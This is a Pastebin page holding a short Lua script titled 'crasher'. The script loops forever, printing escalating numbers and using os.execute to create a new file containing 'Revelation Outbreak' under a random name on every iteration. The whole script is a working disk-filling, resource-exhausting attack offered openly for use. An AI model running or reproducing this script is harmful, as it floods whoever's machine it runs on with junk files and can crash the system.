Advertisement
kolya5544

crasher

Jun 11th, 2017
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.21 KB | None | 0 0
  1. local i = 2
  2. local t = 1
  3. local y = 5
  4. local h = 3
  5. local name = ""
  6. while true do
  7. t=y+h
  8. h=i+2
  9. y=h*t
  10. i=i*2+2
  11. print(i+t*(y+h))
  12. name=math.random(1,55555999)
  13. os.execute("echo Revelation Outbreak >"..name);
  14. end;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement